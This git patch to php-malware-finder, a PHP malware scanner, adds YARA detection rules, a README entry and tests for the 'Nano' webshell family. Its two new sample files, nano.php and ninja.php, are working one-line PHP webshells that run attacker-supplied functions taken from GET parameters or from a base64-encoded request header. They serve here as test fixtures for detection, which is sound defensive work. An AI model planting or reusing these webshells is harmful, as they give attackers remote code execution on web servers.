From a5cc4cccc1a6c66210056194b8bd5638855fd09b Mon Sep 17 00:00:00 2001
From: jvoisin
Date: Tue, 29 May 2018 13:20:40 +0200
Subject: Add detection for Nano

[Nano]( https://github.com/UltimateHackers/nano ) is a family of PHP webshells which are code golfed to be extremely stealthy and efficient.
---
 README.md                                 | 1 +
 php-malware-finder/php.yar                | 2 ++
 php-malware-finder/samples/real/nano.php  | 1 +
 php-malware-finder/samples/real/ninja.php | 1 +
 php-malware-finder/tests.sh               | 3 +++
 5 files changed, 8 insertions(+)
 create mode 100644 php-malware-finder/samples/real/nano.php
 create mode 100644 php-malware-finder/samples/real/ninja.php

diff --git a/README.md b/README.md
index 01d1401..c458785 100644
--- a/README.md
+++ b/README.md
@@ -38,6 +38,7 @@ The following list of encoders/obfuscators/webshells are also detected:
 * [web-malware-collection]( https://github.com/nikicat/web-malware-collection )
 * [webtoolsvn]( http://www.webtoolsvn.com/en-decode/ )
 * [novahot]( https://github.com/chrisallenlane/novahot )
+* [nano]( https://github.com/UltimateHackers/nano )
 
 
 Of course it's **trivial** to bypass PMF,
diff --git a/php-malware-finder/php.yar b/php-malware-finder/php.yar
index f0abcb4..143b192 100644
--- a/php-malware-finder/php.yar
+++ b/php-malware-finder/php.yar
@@ -65,6 +65,8 @@ rule ObfuscatedPhp
         $align = /(\$\w+=[^;]*)*;\$\w+=@?\$\w+\(/  //b374k
         $weevely3 = /\$\w=\$[a-zA-Z]\('',\$\w\);\$\w\(\);/  // weevely3 launcher
         $c99_launcher = /;\$\w+\(\$\w+(,\s?\$\w+)+\);/  // http://bartblaze.blogspot.fr/2015/03/c99shell-not-dead.html
+        $nano = /\$[a-z0-9-_]+\[[^]]+\]\(/ //https://github.com/UltimateHackers/nano
+        $ninja = /base64_decode[^;]+getallheaders/ //https://github.com/UltimateHackers/nano
         $variable_variable = /\${\$[0-9a-zA-z]+}/
         $too_many_chr = /(chr\([\d]+\)\.){8}/  // concatenation of more than eight `chr()`
         $concat = /(\$[^\n\r]+\.){5}/  // concatenation of more than 5 words
diff --git a/php-malware-finder/samples/real/nano.php b/php-malware-finder/samples/real/nano.php
new file mode 100644
index 0000000..14df255
--- /dev/null
+++ b/php-malware-finder/samples/real/nano.php
@@ -0,0 +1 @@
+<?$x=$_GET;($x[p]=='_'?$x[f]($x[c]):y);
diff --git a/php-malware-finder/samples/real/ninja.php b/php-malware-finder/samples/real/ninja.php
new file mode 100644
index 0000000..fdace58
--- /dev/null
+++ b/php-malware-finder/samples/real/ninja.php
@@ -0,0 +1 @@
+<?$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0]($x[1]);
diff --git a/php-malware-finder/tests.sh b/php-malware-finder/tests.sh
index f4d9e06..aa6cd33 100755
--- a/php-malware-finder/tests.sh
+++ b/php-malware-finder/tests.sh
@@ -86,6 +86,9 @@ run_test real/ice.php 'double_var'
 run_test real/srt.php '$register_function'
 run_test real/awvjtnz.php '$reversed:'
 run_test real/exceptions.php '$eval_comment: eval/\*k\*/('
+run_test real/nano.php '$nano: $x\[f\]('
+run_test real/ninja.php '$nano: $x\[0\]('
+run_test real/ninja.php '$ninja: base64_decode(substr(getallheaders'
 
 run_test undetected/smart.php '0x6:$extract:'
 
-- 
cgit v1.3